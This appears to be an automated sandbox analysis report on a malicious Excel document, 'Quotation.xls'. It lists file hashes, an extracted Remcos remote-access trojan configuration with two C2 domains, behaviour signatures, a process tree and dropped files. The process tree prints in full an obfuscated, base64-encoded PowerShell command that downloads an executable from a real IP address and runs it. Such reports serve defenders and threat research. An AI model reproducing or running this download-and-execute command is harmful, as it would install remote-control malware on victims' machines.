Analysis

  • max time kernel
    149s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2024 09:07

General

  • Target

    Quotation.xls

  • Size

    1.0MB

  • MD5

    7a9a6e2a484c942e9247513bf8420f13

  • SHA1

    9a0399a2c75537687cdcaa939adb4a871b56f26e

  • SHA256

    c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5

  • SHA512

    a48ad2da1dddb561a8a64414a8576e03180dccc65cedb94e4733c1d7dba3f8881230d6ec7bb10fe495e13e5fc7449585f52921f9d05d3d1f41361e0b99ec3d2c

  • SSDEEP

    24576:QCvOsc3umX8S4lMiK4uwQP6DdRgLd5+HKtGboP:QCG2xRISDdRgLQu

Malware Config

Extracted

Family

remcos

Botnet

2556

C2

bossnacarpet.com:2556

vegetachcnc.com:2556

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    chrome-6W1HCC

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2848
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1052
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1876
        • C:\Users\Admin\AppData\Roaming\winiti.exe
          "C:\Users\Admin\AppData\Roaming\winiti.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1968
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
            5⤵
              PID:2868
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
              5⤵
                PID:2864
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:2928

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\gdfc[1].hta

        Filesize

        12KB

        MD5

        a183dcd47ab3d4ad39338dfe7eddff53

        SHA1

        4cd5c2dad4510df9516f6d16208bd284add559b5

        SHA256

        85c14a84e7c4d9e2b2ef10bc483f9ae22cfdf3438a2ae818dc8f487a0e455682

        SHA512

        8818b4d8d9bcd37b3d717c6309e825142ea2fd9f0cab68f4ca5232f38e444c90abb75a35e069018cfed867d48f267369bdab67a681a36633e264338adc943791

      • C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp

        Filesize

        1KB

        MD5

        cd9200e66a5fa073a5549f36efb35a50

        SHA1

        c5f1942415b254a8715c92888e19c4e2efbb689b

        SHA256

        beb64070aa5707651ed331e35b53cd295de898c0f547c28cbfe0155415a6a4dc

        SHA512

        0c9b6dd08ccf7524ed00f9ed2c871dd6a7ef36373c8d1603108dd60fd018237f57f7187561d3f36aa33664670993e70110f034c46617e702bd03720bca8212a0

      • C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.dll

        Filesize

        3KB

        MD5

        958fc6d7cff611120a9297af43662996

        SHA1

        f4b17148eedad42cdf26a1ccd7dc17f252450c68

        SHA256

        aee5f00d12d42d731fa43cbd0c39f2fac387c18f51a9c0332c45a6612c447db3

        SHA512

        a203a478aba35b3cf441f0fad42f708c618965767be9d4dd88f8e5267412fd5e45b11ba118f21af2a786b1fd47e006dc180da71087a20b8f3c36dc360cdf9fd7

      • C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.pdb

        Filesize

        7KB

        MD5

        e70684c20cbbb0ba7c7b8634a0727159

        SHA1

        14e5e9df9ad67a941cd7c0cd68f79f9d18d7b5ff

        SHA256

        ac4a8a14046d155b0a0bbcd1b0b19a7f79018d27c70e65957e768323a5db273d

        SHA512

        c2a4556f83a9fcae888b0fc67605ccd01919e6933626b26061e38b465d83519addb8fc9e4c72c5172a877a43bd76124fd86d80410b4dd5673190cd79df60dadb

      • C:\Users\Admin\AppData\Roaming\winiti.exe

        Filesize

        2.2MB

        MD5

        f6bf8ada032d17192526ffebb48aed79

        SHA1

        362cb802e430115288638c9d613f00412f1b2519

        SHA256

        153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d

        SHA512

        0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c

      • \??\c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp

        Filesize

        652B

        MD5

        010033bada91ce77a8eae6c96c8627d2

        SHA1

        ee31b5cf1b1974b77766e6b3bccd730524e18a18

        SHA256

        bf4cc1b4b2f823aac74d3b7e3922fbde66c73a56ecda14d7be050f23f0e2223c

        SHA512

        04c6d9269b2a42fb35f83e707839ea1a01f0946d51d9e2e5ee6db668994b4bf75d030207ce7e77eeccf7060d726a00f455339d0011d84a274e6b2889a0ce1f2d

      • \??\c:\Users\Admin\AppData\Local\Temp\l6tmq1s6.0.cs

        Filesize

        461B

        MD5

        a83dc0e46bbad233951be9e3fdba130c

        SHA1

        892cfc6827bb1072ec2e26bbf83457497d6a17cb

        SHA256

        aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967

        SHA512

        e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa

      • \??\c:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline

        Filesize

        309B

        MD5

        3fce564657419739a0491a5402a8c929

        SHA1

        f405e46f957bdf5d38b310fba68c8175c2acf36d

        SHA256

        47510126de9f30f68ac4fff997269741a20107c7e317800ab4b5e1e2c5688dca

        SHA512

        52b21784bf8520b7fa2e216cb3d925c5b0516c3c89bad08e17eba72ed63acdf655f1f88dd720ce8ab3b64dc0f28246c851bbda29aa16d603a76ae018aaa9c052

      • memory/2628-3-0x00000000022F0000-0x00000000022F2000-memory.dmp

        Filesize

        8KB

      • memory/2848-40-0x000000007292D000-0x0000000072938000-memory.dmp

        Filesize

        44KB

      • memory/2848-4-0x0000000002370000-0x0000000002372000-memory.dmp

        Filesize

        8KB

      • memory/2848-1-0x000000007292D000-0x0000000072938000-memory.dmp

        Filesize

        44KB

      • memory/2848-56-0x000000007292D000-0x0000000072938000-memory.dmp

        Filesize

        44KB

      • memory/2848-53-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2928-38-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-48-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-41-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-42-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-43-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-44-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-45-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-39-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-49-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-50-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-51-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-36-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-37-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-57-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-58-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2928-59-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB